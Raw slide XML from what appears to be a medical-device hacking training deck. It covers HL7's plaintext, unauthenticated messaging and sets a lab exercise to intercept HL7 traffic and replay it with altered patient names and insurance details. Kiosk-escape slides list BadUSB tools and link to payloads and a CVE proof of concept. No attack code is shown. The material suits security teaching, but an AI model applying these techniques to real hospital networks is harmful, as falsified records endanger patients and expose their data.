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4"/>
    <p:restoredTop sz="94679"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="158" d="100"/>
          <a:sy n="158" d="100"/>
        </p:scale>
        <p:origin x="2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DE0-3B04-F350-0448-6F5DB177B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55C17-EF0E-BA1F-F221-F10B7564B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C3DD2B-9DA4-A63F-00C6-791380D1686F}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F56626F-BD4C-9A52-CD07-28E7F7294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59163-A161-3F47-E5ED-2CA40559489C}"/>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321944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234D-F3A2-5ED6-B7E1-B25BFAB92D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EA7450-129F-0F5C-1BDB-75AD037DD2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F7A3A-3577-D632-2E61-824DD843E567}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB95DA84-9608-D4C5-E4B1-E6CD15666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2AFC9-9B68-9E46-3C40-18D35BF9A589}"/>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16050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414EB-A185-3EF9-A815-2C2E8FED79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7CAC30-DBCE-94FE-55EE-064A39B59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676BB-D173-02B4-52D8-DC76335A8A5E}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1851508-D30F-7860-3EC1-45C133D58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196E3-8011-DA7B-E3D0-6894FE599D5B}"/>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99126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3FD3-CE30-789C-2A49-E00C529B1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16297-51B1-C511-CD2A-EFB5C6164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A0A01-F15E-95D3-A6E4-4CCF817E0783}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C3368EF-9150-B90F-2E65-03F685A37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89069-7F23-9208-F009-27FABB1C9605}"/>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109237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9B3D-DEAE-9AE3-5147-9160E57C2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07A9F-2F3B-70AF-07B4-30A67FD2E4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2D3AB-1BF0-7E2B-3BFE-4EB3B75642E0}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7F839A8-E087-ED57-1808-9D7B08DEA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EF6E1-E06F-79CF-7F3C-FFD0FC321ADB}"/>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244192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1B5B-CE58-A79F-F311-E578A8AD9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F946E-F12B-E03F-CEBC-00C752E893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D4FB08-60CA-907F-6A3B-11733AAA3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D0126-78EE-597A-CE54-EACFECB1DEAE}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8065867D-6A9A-4675-9C06-2F07B6279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59285-EE98-FAB6-F455-224176C4C0D9}"/>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200905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7BD7-F324-56B2-F4D5-8B7F32CA48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5491BE-8421-0277-64AF-C7F5453C8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859BF0-03AB-4CEC-4F9A-96A5A30A63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8AEB6D-94C1-74A9-F3A1-D8B8CDFDD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04F4C-A2A1-264E-09C5-E74B43114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E554E9-8305-A46F-81B7-B465FB8D045B}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B61E94C0-F501-777F-C6CE-9E93391B0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FCC208-01B5-0AC3-3458-D35DEBE1FE4B}"/>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1762054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86B2-A4C5-E398-4051-578445047D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AC9D5A-1C2C-DB37-B6D8-300A855A2C3D}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CFC3436-5171-EA69-D548-B21C25D0A3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56F866-B90C-79CB-B3CF-3632EABB969B}"/>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368413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D505B1-0C20-EDD0-F7D8-8F70BEAAC70D}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E5FC0A8-F459-799A-7FB6-21E8DC0FDE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FAEEE7-F366-EF4F-42C4-F114F7C7F822}"/>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148608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230E-B29D-D55D-4A13-308A328DE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E597F4-F8DD-64B5-62B1-5C37232AC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BAD8FC-BA18-D8C8-4069-EC1153EDB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ECD75-C6F5-BA57-E0BB-0A8837AC5410}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{676EF0A8-9D28-FB2D-10CC-A54C8C0383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B361D-49C8-6D28-1D98-3F128E971C3D}"/>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326965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23D5-E833-ED34-70A7-3E826167C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A771-CD6F-4F16-BAAF-E5EE12F94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374F65-1F9C-5571-3DA2-8B74B80F5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7496D-A2AF-4921-6F2A-6EE8A9FB9E8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B5D0EF18-E536-9245-A2AE-C6EEF01C1F87}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3F59E0-86AF-9EAD-2A59-BBD6326BE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9BF1A-892B-CB69-8938-ACD78E0A733C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{33889F78-8527-4B40-9950-B4FF925207E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149725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0E91A9-7F60-A437-1090-A437C810BD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3D0BF-C697-74B9-2D86-2DF6CB256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BD2DE-1921-2F3F-8788-20D5FB2FB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D0EF18-E536-9245-A2AE-C6EEF01C1F87}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3015173-7A69-A56F-4E2B-0B7AC7827A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BE1C2A7-071C-E512-7B64-E10D93142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889F78-8527-4B40-9950-B4FF925207E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4133441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orbes.com/sites/forbestechcouncil/2019/07/12/hl7-is-your-sensitive-data-secure/?sh=587ea25b678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hop.hak5.org/products/bash-bunny" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flipperzero.one/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-tm-quick-reference" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shop.hak5.org/products/usb-rubber-ducky"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ums.hak5.org/topic/40574-trouble-with-key-combo/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/nocomp/Kiosk-evasion-BADUsb-Bruteforce/main/kiosk-evasion-payload.t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ums.hak5.org/topic/40574-trouble-with-key-combo/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/nocomp/Kiosk-evasion-BADUsb-Bruteforce/main/kiosk-evasion-payload.tx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ook.hacktricks.xyz/hardware-physical-access/escaping-from-gui-applica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upport.microsoft.com/en-gb/windows/windows-keyboard-shortcuts-for-accessibility-021bcb62-45c8-e4ef-1e4f-41b8c1fc87f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lgandx/Respond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rubomedical.com/dicom_fi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ShielderSec/poc/tree/main/CVE-2023-3346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cpdump.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wireshark.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shop.hak5.org/products/throwing-star-lan-tap" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/communitydownload" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ettercap-project.or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live.sysinternals.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tyranid/DotNetToJScrip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aduceus with two snakes&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{343050AB-83CF-7B10-9CE1-F7F2522B9AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="11186" b="31573"/>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D4F41D72-0CA6-161B-838E-F1DDA58C0369}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2281382" y="64655"/>
            <a:ext cx="2613216" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Medical Device Hacking </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52450975-DF88-40B3-E4DB-BEDC82498CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11221838" y="6271490"/>
            <a:ext cx="646267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v3ga</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282564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C6A0-A58D-3FE8-6CD2-18AD8BEE11CD}"/>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2B12F500-5DA6-B846-0C39-13BFCB04EADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HL7 - It was originally created in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1989</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. HL7 version 2 defines a series of electronic messages to support administrative, logistical, financial as well as clinical processes. Since 1987 the standard has been updated regularly, resulting in versions 2.1, 2.2, 2.3, 2.3.1, 2.4, 2.5, 2.5.1, 2.6, 2.7, 2.7.1, 2.8, 2.8.1 and 2.8.2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the start, HL7 was arguably built insecurely, making it unsuitable for the public cloud by itself. This poses a major threat to hospitals and patients by making personal and sensitive patient information susceptible to cyber attacks, data privacy breaches, or worse, harm to patients.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334878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C6A0-A58D-3FE8-6CD2-18AD8BEE11CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B12F500-5DA6-B846-0C39-13BFCB04EADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HL7 - It was originally created in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1989</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. HL7 version 2 defines a series of electronic messages to support administrative, logistical, financial as well as clinical processes. Since 1987 the standard has been updated regularly, resulting in versions 2.1, 2.2, 2.3, 2.3.1, 2.4, 2.5, 2.5.1, 2.6, 2.7, 2.7.1, 2.8, 2.8.1 and 2.8.2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the start, HL7 was arguably built insecurely, making it unsuitable for the public cloud by itself. This poses a major threat to hospitals and patients by making personal and sensitive patient information susceptible to cyber attacks, data privacy breaches, or worse, harm to patients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is also in plaintext….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132341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79AA-2265-E711-8CC4-9BC68BA74B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HL7 Vulnerabilities CONTD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E53381B5-5132-B800-5B22-6A6169843342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It lacks any authentication (normally)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only recent advances have added security on top of HL7; however, almost no one uses it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Researchers from the University of California recently conducted a simulation of an HL7 cyber attack, and the findings were alarming. Several encryption and authentication vulnerabilities were exploited, and the simulated attacker had the ability to modify multiple lab results to read from "normal" to "severely ill." This could lead to patient misdiagnosis or prescription of unnecessary medications, making the safety of HL7 data an utmost priority. - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.forbes.com/sites/forbestechcouncil/2019/07/12/hl7-is-your-sensitive-data-secure/?sh=587ea25b678d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223820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A4A1-FA9C-DAA0-4906-C575933118DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I want you to hit me…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image of Come on! Stop trying to hit me, and hit me!">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE6261E5-486B-C25C-7743-C8A1DF752A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1687" y="2202555"/>
            <a:ext cx="7826929" cy="32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784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A4A1-FA9C-DAA0-4906-C575933118DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EXERCISE: HL7 ATTACK!!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C609ED30-9CBC-0B6C-C13B-FB01ACC93278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get the hl7_server.py and Windows HL7sender.py scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the hl7_server.py on your Linux machine and HL7sender.py on your Windows machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use methods to coerce the messages from the client through you to the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to read the HL7 message on the wire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bonus Points and Reward – Create a POC that will send the HL7 message caught, though slightly modified to change the PATIENT NAME and INSURANCE INFO.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25880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BCB1-FDDF-174C-C19A-4E08A5A0CDA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving Inward – The Kiosk (System Testing)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A36D625-422F-D2C8-9E29-16A46D65EEFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I hate kiosks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many of my wins against medical devices have been against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiosk’d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> systems, breaking out of them to allow system exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because I post exploit like a MF, I am able to find further findings, sometimes chaining them together to provide an end-of life POC regarding patient care</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THIS is a patience builder. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383131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BCB1-FDDF-174C-C19A-4E08A5A0CDA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving Inward – The Kiosk (Escape Tools)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A36D625-422F-D2C8-9E29-16A46D65EEFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FlipperZero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://flipperzero.one/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://shop.hak5.org/products/bash-bunny</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>USB Rubber Ducky - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://shop.hak5.org/products/usb-rubber-ducky</a:t>
            </a:r>
